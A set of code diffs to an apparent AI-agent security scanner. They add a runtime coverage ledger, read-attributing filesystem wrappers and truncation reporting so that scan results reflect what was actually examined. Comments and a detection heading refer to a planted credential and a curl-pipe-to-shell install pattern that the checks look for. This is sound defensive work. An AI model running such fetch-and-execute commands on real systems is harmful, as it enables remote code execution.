+++ b/src/hardening/coverage-ledger.ts
@@ -90,16 +90,6 @@ export interface CategoryCoverage {
   filesRead: number;
   /** Why it is `not-examined` / `truncated`. Empty when `examined`. */
   reason?: string;
-  /**
-   * True only when the checks were OBSERVED to look and find nothing — they
-   * inspected paths inside the target and no file of their kind was there.
-   *
-   * A consumer may treat this as benign; every other `not-examined` category
-   * is a coverage GAP. The distinction is carried as a flag rather than left
-   * for the caller to recover by matching on `reason`, so a reworded sentence
-   * cannot silently reclassify a gap as an absence.
-   */
-  observedAbsent?: boolean;
 }
 
 /**
@@ -217,45 +207,6 @@ export const SEMANTIC_PREFIXES: readonly string[] = [
   'SEM-CRED', 'SEM-INST', 'SEM-MCP', 'SEM-PERM',
 ];
 
-/**
- * Which categories a COMPILED ARTIFACT of each type is evidence for.
- *
- * The semantic layer used to credit all 15 families above from a single
- * boolean — `artifactsCompiled > 0`. That is a claim read off a hand-written
- * list, which is the very thing this module exists to stop: on a repo with no
- * MCP config at all, four MCP checks each read nothing and the category still
- * reported `examined`, sourced only to `nanomind-semantic`.
- *
- * So the credit is now measured from the artifact TYPES the run actually
- * compiled. Source files carry the analyzers that read any code; an
- * artifact-specific category (MCP, skill, governance, A2A) is credited only
- * when an artifact of that kind was really compiled. An unknown type credits
- * nothing, which is the fail-closed direction.
- */
-const ARTIFACT_TYPE_CATEGORIES: Readonly<Record<string, readonly string[]>> = {
-  // Source code is what the generic AST analyzers read.
-  source_code: ['credentials', 'injection', 'prompt', 'capabilities', 'sandbox', 'network'],
-  // Artifact-specific surfaces: present only if such an artifact was compiled.
-  mcp_config: ['MCP', 'capabilities'],
-  skill: ['skill', 'capabilities', 'prompt'],
-  soul: ['governance', 'prompt'],
-  agent_config: ['governance', 'capabilities'],
-  system_prompt: ['prompt', 'governance'],
-  a2a_card: ['A2A', 'identity'],
-  heartbeat: ['heartbeat'],
-};
-
-/** Categories the compiled artifact types are evidence for. Measured input. */
-export function categoriesForArtifactTypes(types: readonly string[]): string[] {
-  const out = new Set<string>();
-  // Fail closed on a malformed caller: credit nothing rather than throw, so a
-  // bad input can never be the reason a coverage claim is missing OR inflated.
-  if (!Array.isArray(types)) return [];
-  for (const t of types) {
-    for (const c of ARTIFACT_TYPE_CATEGORIES[t] ?? []) out.add(c);
-  }
-  return [...out];
-}
 
 /**
  * Category label for a check-ID prefix.
@@ -503,6 +454,10 @@ export class CoverageLedger {
   categoryFileCounts(): Record<string, number> {
     const byCategory = new Map<string, Set<string>>();
     for (const [method, paths] of this.readsByMethod) {
+      // A check that threw cannot vouch for what it covered, and `summarize`
+      // already omits it from `methods`; crediting its reads here would have
+      // the count disagree with the method list beside it.
+      if (!this.executions.get(method)?.completed) continue;
       for (const prefix of CHECK_METHOD_PREFIXES[method] ?? []) {
         const category = PREFIX_TO_CATEGORY[prefix];
         if (!category) continue;
@@ -530,12 +485,6 @@ export class CoverageLedger {
 
 /** Extra evidence from layers that are not `check*` methods. */
 export interface SummarizeOptions {
-  /**
-   * What the semantic layer compiled: the artifact TYPES it produced, and how
-   * many artifacts. Types are measured per run; the count alone is not
-   * evidence about any particular category.
-   */
-  semantic?: { artifactTypes: string[]; artifactsCompiled: number };
   /**
    * Check IDs of findings this scan actually reported.
    *
@@ -639,18 +588,6 @@ export function summarizeCoverage(
     }
   }
 
-  if (opts?.semantic && opts.semantic.artifactsCompiled > 0) {
-    for (const category of categoriesForArtifactTypes(opts.semantic.artifactTypes)) {
-      if (!byCategory.has(category) && !ALL_CATEGORIES.has(category)) continue;
-      const c = bucket(category);
-      c.state = 'examined';
-      if (!c.methods.includes('nanomind-semantic')) c.methods.push('nanomind-semantic');
-      // Not summed into filesRead: the compiled artifacts are the same files
-      // the static checks already counted, and adding them again is what made
-      // a per-category total exceed the size of the tree.
-    }
-  }
-
   // A cap downgrades an examined category to truncated: the checks ran, but a
   // clear result only covers the part of the tree they reached.
   for (const t of truncations) {
@@ -675,19 +612,19 @@ export function summarizeCoverage(
       c.reason = skipped[0]!.skipReason;
     } else if (methods.length === 0) {
       c.reason = 'no check in this category ran';
-    } else if (records.some(r => r?.completed && r.pathsInspected > 0)) {
-      c.observedAbsent = true;
-      // The checks looked — they stat'd or listed paths inside the target —
-      // and found no file of their kind. That is a genuine absence.
-      c.reason = 'checks ran and found no file of this kind in the target';
     } else {
-      // Nothing was read AND nothing was even inspected, so there is no
-      // evidence these checks touched the target at all. Reporting that as
-      // "no such surface here" would convert an instrumentation hole into
-      // reassurance: `checkContextLifecycle` delegates to a module that reads
-      // through an untracked `fs`, so it read 177 files and recorded none.
-      // Absence has to be observed, not inferred from silence.
-      c.reason = 'no evidence these checks inspected the target';
+      // Deliberately ONE reason, stating only what was measured: these checks
+      // read no file here. Whether that is because the surface is absent or
+      // because the read was not attributed is NOT inferred.
+      //
+      // An earlier cut split the two on `pathsInspected > 0`. Both directions
+      // were wrong. Checks that probe exact filenames never succeed on a repo
+      // without them, so a genuine absence could not be recognised and every
+      // ordinary repo grew a warning; and a `readdir` of the target root by an
+      // unrelated check in the same category flipped the flag on evidence that
+      // said nothing about the surface. An inference that fails in both
+      // directions is not worth the sentence it prints.
+      c.reason = 'these checks read no file of this kind in the target';
     }
   }
 

--- a/src/hardening/scanner.ts
+++ b/src/hardening/scanner.ts
@@ -2830,6 +2830,9 @@ export class HardeningScanner {
         filesExamined: this.coverage.filesExamined,
         executions: this.coverage.records,
         truncations: this.coverage.caps,
+        // Counts, never paths — a single-file scan normalises its target into
+        // a generated temp directory, and emitting read paths leaked that name.
+        filesReadByCategory: this.coverage.categoryFileCounts(),
       },
     };
   }

--- a/src/hardening/scanner.ts
+++ b/src/hardening/scanner.ts
@@ -3,7 +3,11 @@
  * Scans for security issues and optionally auto-fixes them
  */
 
-import * as fs from 'fs/promises';
+// `fs/promises` with read attribution for the coverage ledger. Wrapping the
+// namespace once is what lets all 153 read sites report what they examined
+// without a per-call-site sweep — a sweep would be fail-OPEN, and a site
+// missed in it would claim coverage it never had. See `tracked-fs.ts`.
+import { fs } from './tracked-fs';
 // `realpath.native` exists only on the callback and sync APIs, and the backup
 // root needs it: the JS implementation does not canonicalize case (#334).
 import * as fsSync from 'fs';
@@ -40,6 +44,13 @@ import { parseAiConfig, proseAllowEntry, forReport, MAX_TEXT } from '../scanner/
 /** Redact, escape and cap a value out of a scanned config before quoting it. */
 const forFinding = (s: string): string => forReport(s, MAX_TEXT);
 import { escapeForDisplay } from '../ui/display-safe';
+import {
+  CoverageLedger,
+  withActiveLedger,
+  type CategoryCoverage,
+  type CheckExecution,
+  type CoverageTruncation,
+} from './coverage-ledger';
 
 /**
  * Backup manifest format version. v1 (pre-0.25.1) wrote `createdFiles` as a
@@ -1555,6 +1566,14 @@ export function stampSequenceField(seq: number, attempt: number): string {
 
 export class HardeningScanner {
   private cliName = 'hackmyagent';
+  /**
+   * Coverage ledger for the current `scan()`. Replaced per run.
+   *
+   * Initialised to a ledger rooted at a path nothing resolves inside, so a
+   * check invoked outside `scan()` records against a throwaway rather than
+   * crashing or, worse, banking evidence onto the previous run's ledger.
+   */
+  private coverage: CoverageLedger = new CoverageLedger(path.join(path.sep, 'hackmyagent-no-active-scan'));
   /** Fix writes that did not land this run. Reset per `scan()`. */
   private fixWriteFailures: { file: string; code: string; message: string }[] = [];
   /**
@@ -1807,7 +1826,21 @@ export class HardeningScanner {
     });
   }
 
+  /**
+   * Install a fresh coverage ledger for this run, then scan.
+   *
+   * The ledger is per-run and the install is scoped: a nested scan (the verify
+   * pass a `--fix` performs through its own scanner instance) collects onto
+   * its own ledger and restores this one on the way out, so neither run banks
+   * the other's evidence.
+   */
   async scan(options: ScanOptions): Promise<ScanResult> {
+    const ledger = new CoverageLedger(options.targetDir);
+    this.coverage = ledger;
+    return withActiveLedger(ledger, () => this.scanInner(options));
+  }
+
+  private async scanInner(options: ScanOptions): Promise<ScanResult> {
     const { targetDir, autoFix = false, dryRun = false, ignore = [], cliName = 'hackmyagent' } = options;
     this.cliName = cliName;
     // Per-run, so a reused scanner instance cannot report a previous run's
@@ -1898,245 +1931,255 @@ export class HardeningScanner {
     const findings: SecurityFinding[] = [];
 
     // Credential exposure checks
-    const credFindings = await this.checkCredentialExposure(targetDir, shouldFix);
+    const credFindings = await this.coverage.run('checkCredentialExposure', () => this.checkCredentialExposure(targetDir, shouldFix));
     findings.push(...credFindings);
 
     // CLAUDE.md specific checks
-    const claudeFindings = await this.checkClaudeMd(targetDir, shouldFix);
+    const claudeFindings = await this.coverage.run('checkClaudeMd', () => this.checkClaudeMd(targetDir, shouldFix));
     findings.push(...claudeFindings);
 
     // MCP configuration checks
-    const mcpFindings = await this.checkMcpConfig(targetDir, shouldFix);
+    const mcpFindings = await this.coverage.run('checkMcpConfig', () => this.checkMcpConfig(targetDir, shouldFix));
     findings.push(...mcpFindings);
 
     // File permission checks
-    const permFindings = await this.checkFilePermissions(targetDir, shouldFix);
+    const permFindings = await this.coverage.run('checkFilePermissions', () => this.checkFilePermissions(targetDir, shouldFix));
     findings.push(...permFindings);
 
     // Git security checks (skip for downloaded npm packages — not a source repo)
     if (!options.isNpmPackage) {
-      const gitFindings = await this.checkGitSecurity(targetDir, shouldFix);
+      const gitFindings = await this.coverage.run('checkGitSecurity', () => this.checkGitSecurity(targetDir, shouldFix));
       findings.push(...gitFindings);
+    } else {
+      this.coverage.skip('checkGitSecurity', 'target is a downloaded npm package, not a source repo');
     }
 
     // Network security checks
-    const netFindings = await this.checkNetworkSecurity(targetDir, shouldFix);
+    const netFindings = await this.coverage.run('checkNetworkSecurity', () => this.checkNetworkSecurity(targetDir, shouldFix));
     findings.push(...netFindings);
 
     // --- Standard and Deep checks (skipped in quick mode) ---
     if (!isQuick) {
     // Additional MCP checks
-    const mcpAdvFindings = await this.checkMcpAdvanced(targetDir, shouldFix);
+    const mcpAdvFindings = await this.coverage.run('checkMcpAdvanced', () => this.checkMcpAdvanced(targetDir, shouldFix));
     findings.push(...mcpAdvFindings);
 
     // Claude Code advanced checks
-    const claudeAdvFindings = await this.checkClaudeAdvanced(targetDir, shouldFix);
+    const claudeAdvFindings = await this.coverage.run('checkClaudeAdvanced', () => this.checkClaudeAdvanced(targetDir, shouldFix));
     findings.push(...claudeAdvFindings);
 
     // Cursor configuration checks
-    const cursorFindings = await this.checkCursorConfig(targetDir, shouldFix);
+    const cursorFindings = await this.coverage.run('checkCursorConfig', () => this.checkCursorConfig(targetDir, shouldFix));
     findings.push(...cursorFindings);
 
     // VSCode configuration checks
-    const vscodeFindings = await this.checkVscodeConfig(targetDir, shouldFix);
+    const vscodeFindings = await this.coverage.run('checkVscodeConfig', () => this.checkVscodeConfig(targetDir, shouldFix));
     findings.push(...vscodeFindings);
 
     // Additional credential checks
-    const credAdvFindings = await this.checkCredentialsAdvanced(targetDir, shouldFix);
+    const credAdvFindings = await this.coverage.run('checkCredentialsAdvanced', () => this.checkCredentialsAdvanced(targetDir, shouldFix));
     findings.push(...credAdvFindings);
 
     // Additional permission checks
-    const permAdvFindings = await this.checkPermissionsAdvanced(targetDir, shouldFix);
+    const permAdvFindings = await this.coverage.run('checkPermissionsAdvanced', () => this.checkPermissionsAdvanced(targetDir, shouldFix));
     findings.push(...permAdvFindings);
 
     // Environment and config checks
-    const envFindings = await this.checkEnvironmentSecurity(targetDir, shouldFix);
+    const envFindings = await this.coverage.run('checkEnvironmentSecurity', () => this.checkEnvironmentSecurity(targetDir, shouldFix));
     findings.push(...envFindings);
 
     // Logging and audit checks
-    const logFindings = await this.checkLoggingSecurity(targetDir, shouldFix);
+    const logFindings = await this.coverage.run('checkLoggingSecurity', () => this.checkLoggingSecurity(targetDir, shouldFix));
     findings.push(...logFindings);
 
     // Dependency checks
-    const depFindings = await this.checkDependencySecurity(targetDir, shouldFix);
+    const depFindings = await this.coverage.run('checkDependencySecurity', () => this.checkDependencySecurity(targetDir, shouldFix));
     findings.push(...depFindings);
 
     // Session and auth checks
-    const authFindings = await this.checkAuthSecurity(targetDir, shouldFix);
+    const authFindings = await this.coverage.run('checkAuthSecurity', () => this.checkAuthSecurity(targetDir, shouldFix));
     findings.push(...authFindings);
 
     // Process and runtime checks
-    const procFindings = await this.checkProcessSecurity(targetDir, shouldFix);
+    const procFindings = await this.coverage.run('checkProcessSecurity', () => this.checkProcessSecurity(targetDir, shouldFix));
     findings.push(...procFindings);
 
     // Additional Claude checks
-    const claude3Findings = await this.checkClaudeExtended(targetDir, shouldFix);
+    const claude3Findings = await this.coverage.run('checkClaudeExtended', () => this.checkClaudeExtended(targetDir, shouldFix));
     findings.push(...claude3Findings);
 
     // Additional MCP checks
-    const mcp2Findings = await this.checkMcpExtended(targetDir, shouldFix);
+    const mcp2Findings = await this.coverage.run('checkMcpExtended', () => this.checkMcpExtended(targetDir, shouldFix));
     findings.push(...mcp2Findings);
 
     // Additional network checks
-    const net2Findings = await this.checkNetworkExtended(targetDir, shouldFix);
+    const net2Findings = await this.coverage.run('checkNetworkExtended', () => this.checkNetworkExtended(targetDir, shouldFix));
     findings.push(...net2Findings);
 
     // Input/output security checks
-    const ioFindings = await this.checkIOSecurity(targetDir, shouldFix);
+    const ioFindings = await this.coverage.run('checkIOSecurity', () => this.checkIOSecurity(targetDir, shouldFix));
     findings.push(...ioFindings);
 
     // API security checks
-    const apiFindings = await this.checkAPISecurity(targetDir, shouldFix);
+    const apiFindings = await this.coverage.run('checkAPISecurity', () => this.checkAPISecurity(targetDir, shouldFix));
     findings.push(...apiFindings);
 
     // Secret management checks
-    const secretFindings = await this.checkSecretManagement(targetDir, shouldFix);
+    const secretFindings = await this.coverage.run('checkSecretManagement', () => this.checkSecretManagement(targetDir, shouldFix));
     findings.push(...secretFindings);
 
     // Prompt injection defense checks
-    const promptFindings = await this.checkPromptSecurity(targetDir, shouldFix);
+    const promptFindings = await this.coverage.run('checkPromptSecurity', () => this.checkPromptSecurity(targetDir, shouldFix));
     findings.push(...promptFindings);
 
     // Input validation checks
-    const injFindings = await this.checkInputValidation(targetDir, shouldFix);
+    const injFindings = await this.coverage.run('checkInputValidation', () => this.checkInputValidation(targetDir, shouldFix));
     findings.push(...injFindings);
 
     // Rate limiting checks
-    const rateFindings = await this.checkRateLimiting(targetDir, shouldFix);
+    const rateFindings = await this.coverage.run('checkRateLimiting', () => this.checkRateLimiting(targetDir, shouldFix));
     findings.push(...rateFindings);
 
     // Session security checks
-    const sessionFindings = await this.checkSessionSecurity(targetDir, shouldFix);
+    const sessionFindings = await this.coverage.run('checkSessionSecurity', () => this.checkSessionSecurity(targetDir, shouldFix));
     findings.push(...sessionFindings);
 
     // Encryption checks
-    const encryptFindings = await this.checkEncryption(targetDir, shouldFix);
+    const encryptFindings = await this.coverage.run('checkEncryption', () => this.checkEncryption(targetDir, shouldFix));
     findings.push(...encryptFindings);
 
     // Audit trail checks
-    const auditFindings = await this.checkAuditTrail(targetDir, shouldFix);
+    const auditFindings = await this.coverage.run('checkAuditTrail', () => this.checkAuditTrail(targetDir, shouldFix));
     findings.push(...auditFindings);
 
     // Sandboxing checks
-    const sandboxFindings = await this.checkSandboxing(targetDir, shouldFix);
+    const sandboxFindings = await this.coverage.run('checkSandboxing', () => this.checkSandboxing(targetDir, shouldFix));
     findings.push(...sandboxFindings);
 
     // Tool boundary checks
-    const toolFindings = await this.checkToolBoundaries(targetDir, shouldFix);
+    const toolFindings = await this.coverage.run('checkToolBoundaries', () => this.checkToolBoundaries(targetDir, shouldFix));
     findings.push(...toolFindings);
 
     // OpenClaw skill checks
-    const skillFindings = await this.checkOpenclawSkills(targetDir, shouldFix);
+    const skillFindings = await this.coverage.run('checkOpenclawSkills', () => this.checkOpenclawSkills(targetDir, shouldFix));
     findings.push(...skillFindings);
 
     // OpenClaw heartbeat checks
-    const heartbeatFindings = await this.checkOpenclawHeartbeat(targetDir, shouldFix);
+    const heartbeatFindings = await this.coverage.run('checkOpenclawHeartbeat', () => this.checkOpenclawHeartbeat(targetDir, shouldFix));
     findings.push(...heartbeatFindings);
 
     // OpenClaw gateway checks
-    const gatewayFindings = await this.checkOpenclawGateway(targetDir, shouldFix);
+    const gatewayFindings = await this.coverage.run('checkOpenclawGateway', () => this.checkOpenclawGateway(targetDir, shouldFix));
     findings.push(...gatewayFindings);
 
     // OpenClaw config checks
-    const configFindings = await this.checkOpenclawConfig(targetDir, shouldFix);
+    const configFindings = await this.coverage.run('checkOpenclawConfig', () => this.checkOpenclawConfig(targetDir, shouldFix));
     findings.push(...configFindings);
 
     // OpenClaw supply chain checks
-    const supplyFindings = await this.checkOpenclawSupplyChain(targetDir, shouldFix);
+    const supplyFindings = await this.coverage.run('checkOpenclawSupplyChain', () => this.checkOpenclawSupplyChain(targetDir, shouldFix));
     findings.push(...supplyFindings);
 
     // OpenClaw CVE-specific checks
-    const cveFindings = await this.checkOpenclawCVE(targetDir, shouldFix);
+    const cveFindings = await this.coverage.run('checkOpenclawCVE', () => this.checkOpenclawCVE(targetDir, shouldFix));
     findings.push(...cveFindings);
 
     // Unicode steganography checks (GlassWorm detection)
-    const unicodeStegoFindings = await this.checkUnicodeSteganography(targetDir, shouldFix);
+    const unicodeStegoFindings = await this.coverage.run('checkUnicodeSteganography', () => this.checkUnicodeSteganography(targetDir, shouldFix));
     findings.push(...unicodeStegoFindings);
 
     // Memory/context poisoning checks
-    const memFindings = await this.checkMemoryPoisoning(targetDir, shouldFix);
+    const memFindings = await this.coverage.run('checkMemoryPoisoning', () => this.checkMemoryPoisoning(targetDir, shouldFix));
     findings.push(...memFindings);
 
     // RAG poisoning checks
-    const ragFindings = await this.checkRAGPoisoning(targetDir, shouldFix);
+    const ragFindings = await this.coverage.run('checkRAGPoisoning', () => this.checkRAGPoisoning(targetDir, shouldFix));
     findings.push(...ragFindings);
 
     // Agent identity checks
-    const aimFindings = await this.checkAgentIdentity(targetDir, shouldFix);
+    const aimFindings = await this.coverage.run('checkAgentIdentity', () => this.checkAgentIdentity(targetDir, shouldFix));
     findings.push(...aimFindings);
 
     // Agent DNA integrity checks
-    const dnaFindings = await this.checkAgentDNA(targetDir, shouldFix);
+    const dnaFindings = await this.coverage.run('checkAgentDNA', () => this.checkAgentDNA(targetDir, shouldFix));
     findings.push(...dnaFindings);
 
     // Skill memory manipulation checks
-    const skillMemFindings = await this.checkSkillMemory(targetDir, shouldFix);
+    const skillMemFindings = await this.coverage.run('checkSkillMemory', () => this.checkSkillMemory(targetDir, shouldFix));
     findings.push(...skillMemFindings);
 
     // NemoClaw codebase pattern checks
-    const nemoFindings = await this.checkNemoClawPatterns(targetDir, shouldFix);
+    const nemoFindings = await this.coverage.run('checkNemoClawPatterns', () => this.checkNemoClawPatterns(targetDir, shouldFix));
     findings.push(...nemoFindings);
 
     // AI infrastructure exposure checks (research gap coverage)
-    const llmFindings = await this.checkLLMExposure(targetDir, shouldFix);
+    const llmFindings = await this.coverage.run('checkLLMExposure', () => this.checkLLMExposure(targetDir, shouldFix));
     findings.push(...llmFindings);
 
-    const aiToolFindings = await this.checkAIToolExposure(targetDir, shouldFix);
+    const aiToolFindings = await this.coverage.run('checkAIToolExposure', () => this.checkAIToolExposure(targetDir, shouldFix));
     findings.push(...aiToolFindings);
 
-    const a2aFindings = await this.checkA2AExposure(targetDir, shouldFix);
+    const a2aFindings = await this.coverage.run('checkA2AExposure', () => this.checkA2AExposure(targetDir, shouldFix));
     findings.push(...a2aFindings);
 
-    const mcpDiscoveryFindings = await this.checkMCPDiscovery(targetDir, shouldFix);
+    const mcpDiscoveryFindings = await this.coverage.run('checkMCPDiscovery', () => this.checkMCPDiscovery(targetDir, shouldFix));
     findings.push(...mcpDiscoveryFindings);
 
-    const webCredFindings = await this.checkWebServedCredentials(targetDir, shouldFix);
+    const webCredFindings = await this.coverage.run('checkWebServedCredentials', () => this.checkWebServedCredentials(targetDir, shouldFix));
     findings.push(...webCredFindings);
 
     // Code injection, supply chain, and operational security checks
     // NOTE: CODEINJ-001 removed — deduplicated with NEMO-005 (same detection)
 
-    const installFindings = await this.checkInstallScripts(targetDir, shouldFix);
+    const installFindings = await this.coverage.run('checkInstallScripts', () => this.checkInstallScripts(targetDir, shouldFix));
     findings.push(...installFindings);
 
-    const cliPassFindings = await this.checkCLICredentialPassthrough(targetDir, shouldFix);
+    const cliPassFindings = await this.coverage.run('checkCLICredentialPassthrough', () => this.checkCLICredentialPassthrough(targetDir, shouldFix));
     findings.push(...cliPassFindings);
 
-    const integrityFindings = await this.checkIntegrityBypass(targetDir, shouldFix);
+    const integrityFindings = await this.coverage.run('checkIntegrityBypass', () => this.checkIntegrityBypass(targetDir, shouldFix));
     findings.push(...integrityFindings);
 
-    const toctouFindings = await this.checkTOCTOU(targetDir, shouldFix);
+    const toctouFindings = await this.coverage.run('checkTOCTOU', () => this.checkTOCTOU(targetDir, shouldFix));
     findings.push(...toctouFindings);
 
     // NOTE: TMPPATH-001 removed — deduplicated with NEMO-006 (same detection)
 
-    const dockerInjFindings = await this.checkDockerInjection(targetDir, shouldFix);
+    const dockerInjFindings = await this.coverage.run('checkDockerInjection', () => this.checkDockerInjection(targetDir, shouldFix));
     findings.push(...dockerInjFindings);
 
     // NOTE: ENVLEAK-001 removed — deduplicated with NEMO-007 (same detection)
 
-    const sandboxMsgFindings = await this.checkSandboxMessaging(targetDir, shouldFix);
+    const sandboxMsgFindings = await this.coverage.run('checkSandboxMessaging', () => this.checkSandboxMessaging(targetDir, shouldFix));
     findings.push(...sandboxMsgFindings);
 
-    const webExposeFindings = await this.checkWebExposedFiles(targetDir, shouldFix);
+    const webExposeFindings = await this.coverage.run('checkWebExposedFiles', () => this.checkWebExposedFiles(targetDir, shouldFix));
     findings.push(...webExposeFindings);
 
-    const soulOverrideFindings = await this.checkSoulOverride(targetDir, shouldFix);
+    const soulOverrideFindings = await this.coverage.run('checkSoulOverride', () => this.checkSoulOverride(targetDir, shouldFix));
     findings.push(...soulOverrideFindings);
 
-    const soulGovFindings = await this.checkSoulGovernanceGaps(targetDir);
+    const soulGovFindings = await this.coverage.run('checkSoulGovernanceGaps', () => this.checkSoulGovernanceGaps(targetDir));
     findings.push(...soulGovFindings);
 
-    const memSanitizeFindings = await this.checkMemoryStoreSanitization(targetDir, shouldFix);
+    const memSanitizeFindings = await this.coverage.run('checkMemoryStoreSanitization', () => this.checkMemoryStoreSanitization(targetDir, shouldFix));
     findings.push(...memSanitizeFindings);
 
-    const agentCredFindings = await this.checkAgentCredentialProtection(targetDir, shouldFix);
+    const agentCredFindings = await this.coverage.run('checkAgentCredentialProtection', () => this.checkAgentCredentialProtection(targetDir, shouldFix));
     findings.push(...agentCredFindings);
 
     // Context lifecycle assembly checks (Stage 1)
-    const lifecycleFindings = await this.checkContextLifecycle(targetDir, options);
+    const lifecycleFindings = await this.coverage.run('checkContextLifecycle', () => this.checkContextLifecycle(targetDir, options));
     findings.push(...lifecycleFindings);
     } // end of standard/deep checks
+
+    // A quick scan runs 6 of the 61 orchestrated checks. Record the other 55
+    // as skipped so their categories report `not examined` with the depth as
+    // the reason, instead of inheriting the fail-closed default's vaguer
+    // "no check in this category ran".
+    if (isQuick) {
+      this.coverage.skipUnrun('scan depth is `quick` — standard and deep checks did not run');
+    }
 
     // Layer 2: Structural analysis (standard and deep only)
     let layer2Count = 0;
@@ -2780,6 +2823,14 @@ export class HardeningScanner {
         llmCost,
         cachedResults,
       } : undefined,
+      // What this run actually examined, measured rather than configured.
+      // The renderer derives the Categories / Checks lines from this, so a
+      // category with no executed check can no longer print as clear.
+      coverage: {
+        filesExamined: this.coverage.filesExamined,
+        executions: this.coverage.records,
+        truncations: this.coverage.caps,
+      },
     };
   }
 
@@ -12666,6 +12717,24 @@ dist/
     const cappedTsJs = tsJsFiles.slice(0, maxFiles);
     const cappedPy = pyFiles.slice(0, maxFiles);
     const cappedYaml = yamlFiles.slice(0, maxFiles);
+
+    // A cap that fires means a clean NEMO result covers only the files that
+    // were reached, not the tree. Reported so the category prints `partial`
+    // rather than clear — the number was a cap, and a cap presented as a
+    // measurement is what made `200 files analyzed` read as completeness.
+    const nemoDropped =
+      Math.max(0, shFiles.length - cappedSh.length) +
+      Math.max(0, tsJsFiles.length - cappedTsJs.length) +
+      Math.max(0, pyFiles.length - cappedPy.length) +
+      Math.max(0, yamlFiles.length - cappedYaml.length);
+    if (nemoDropped > 0) {
+      this.coverage.truncate({
+        layer: 'nemo-source',
+        cap: maxFiles,
+        prefixes: ['NEMO'],
+        reason: `capped at ${maxFiles} files per extension — ${nemoDropped} source file${nemoDropped === 1 ? '' : 's'} not read`,
+      });
+    }
 
     // ---------- NEMO-001: Curl-pipe install without checksum ----------
     let nemo001Found = false;

--- a/src/hardening/security-check.ts
+++ b/src/hardening/security-check.ts
@@ -205,6 +205,43 @@ export interface ScanResult {
    * Consumers that aggregate `findings` get the target's findings only.
    */
   machinePosture?: MachinePostureSummary[];
+  /**
+   * What this scan ACTUALLY examined, measured at runtime.
+   *
+   * Before this existed, the Observations block derived its coverage claim
+   * from `TAXONOMY_MAP` — the configured check set — so `310 static · 0
+   * skipped · (all clear)` was printed identically whether the checks ran
+   * against the tree or not. Measured on a 528-file repo carrying a planted
+   * credential and a `curl … | sh`, the output was byte-identical to the
+   * unplanted tree's. Every field here is evidence from the run.
+   */
+  coverage?: {
+    /** Distinct files inside the target whose contents the scan read. */
+    filesExamined: number;
+    /** Per-check-method execution records. */
+    executions: CoverageCheckExecution[];
+    /** Caps that stopped a layer short of the whole tree. */
+    truncations: CoverageTruncationRecord[];
+  };
+}
+
+/** One check method's execution record. Mirrors `CheckExecution`. */
+export interface CoverageCheckExecution {
+  method: string;
+  prefixes: string[];
+  completed: boolean;
+  filesRead: number;
+  pathsInspected: number;
+  skipReason?: string;
+  error?: string;
+}
+
+/** One cap that stopped a layer short. Mirrors `CoverageTruncation`. */
+export interface CoverageTruncationRecord {
+  layer: string;
+  cap: number;
+  prefixes: string[];
+  reason: string;
 }
 
 /**

--- a/src/hardening/security-check.ts
+++ b/src/hardening/security-check.ts
@@ -211,7 +211,7 @@ export interface ScanResult {
    * Before this existed, the Observations block derived its coverage claim
    * from `TAXONOMY_MAP` — the configured check set — so `310 static · 0
    * skipped · (all clear)` was printed identically whether the checks ran
-   * against the tree or not. Measured on a 528-file repo carrying a planted
+   * against the tree or not. Measured on a 529-file repo carrying a planted
    * credential and a `curl … | sh`, the output was byte-identical to the
    * unplanted tree's. Every field here is evidence from the run.
    */
@@ -222,6 +222,8 @@ export interface ScanResult {
     executions: CoverageCheckExecution[];
     /** Caps that stopped a layer short of the whole tree. */
     truncations: CoverageTruncationRecord[];
+    /** Distinct files read per category. Counts only — never filenames. */
+    filesReadByCategory?: Record<string, number>;
   };
 }
 

--- a/src/hardening/tracked-fs.ts
+++ b/src/hardening/tracked-fs.ts
@@ -1,0 +1,93 @@
+/**
+ * `fs/promises` namespace with read attribution for the coverage ledger.
+ *
+ * The scanner reads the target through 153 separate `fs.readFile` call sites
+ * plus a spread of `stat` / `readdir` / `access` calls. Instrumenting each one
+ * would be fail-OPEN: a site missed in the sweep would let its check claim
+ * coverage it never had, which is the exact defect the ledger exists to fix.
+ *
+ * So the namespace is wrapped once, here, and `scanner.ts` imports this
+ * instead of `fs/promises`. Every existing call site is attributed with no
+ * edit, and any call site added later is attributed automatically.
+ *
+ * Only the read-shaped calls report. Writes are not coverage evidence, and
+ * they pass through untouched. Attribution itself is filtered by the active
+ * ledger: a read outside the scan target is not evidence about the target.
+ */
+
+import * as realFs from 'fs/promises';
+import { noteRead, noteInspect } from './coverage-ledger';
+
+/**
+ * Calls whose first argument is a path the scanner READ THE CONTENTS of.
+ * These are the strongest form of evidence: the check saw the bytes.
+ */
+const CONTENT_READS = ['readFile'] as const;
+
+/**
+ * Calls that inspect a path without reading its contents. Weaker evidence,
+ * but still evidence: a permissions check that `stat`s a file examined it,
+ * even though it never opened it.
+ */
+const PATH_INSPECTIONS = [
+  'readdir', 'stat', 'lstat', 'access', 'realpath', 'readlink', 'opendir',
+] as const;
+
+type AnyFn = (...args: unknown[]) => unknown;
+
+/**
+ * Wrap one namespace member so a SUCCESSFUL call reports what it touched.
+ *
+ * Attribution happens on resolve, never on call. The scanner probes for files
+ * that usually do not exist — `.env.production`, `compose.yaml`, a dozen
+ * config spellings per check — and counting those probes inflates the
+ * coverage number with paths that hold nothing. Measured on a 529-file tree,
+ * report-on-call gave `549 files examined`: more files than the tree contains,
+ * a number that cannot be true and that overstates coverage, which is the one
+ * direction this ledger must never be wrong in.
+ *
+ * A failed read is therefore not evidence. There was nothing there to examine.
+ */
+function attribute<T extends AnyFn>(fn: T, report: (target: unknown) => void): T {
+  return function (this: unknown, ...args: unknown[]) {
+    const target = args[0];
+    const out = fn.apply(this, args) as Promise<unknown>;
+    if (out && typeof (out as Promise<unknown>).then === 'function') {
+      return out.then(
+        (value) => {
+          report(target);
+          return value;
+        },
+        (err) => {
+          throw err;
+        },
+      );
+    }
+    // Non-thenable return (no such member in `fs/promises` today, but the
+    // wrapper must not swallow one if a future Node adds it).
+    report(target);
+    return out;
+  } as unknown as T;
+}
+
+const wrapped: Record<string, unknown> = { ...realFs };
+
+for (const name of CONTENT_READS) {
+  const fn = (realFs as unknown as Record<string, unknown>)[name];
+  if (typeof fn === 'function') wrapped[name] = attribute(fn as AnyFn, noteRead);
+}
+
+for (const name of PATH_INSPECTIONS) {
+  const fn = (realFs as unknown as Record<string, unknown>)[name];
+  if (typeof fn === 'function') wrapped[name] = attribute(fn as AnyFn, noteInspect);
+}
+
+/**
+ * Drop-in replacement for `import * as fs from 'fs/promises'`.
+ *
+ * Typed as the real namespace so the scanner's existing call sites keep their
+ * signatures and `tsc` still checks them.
+ */
+export const fs = wrapped as unknown as typeof realFs;
+
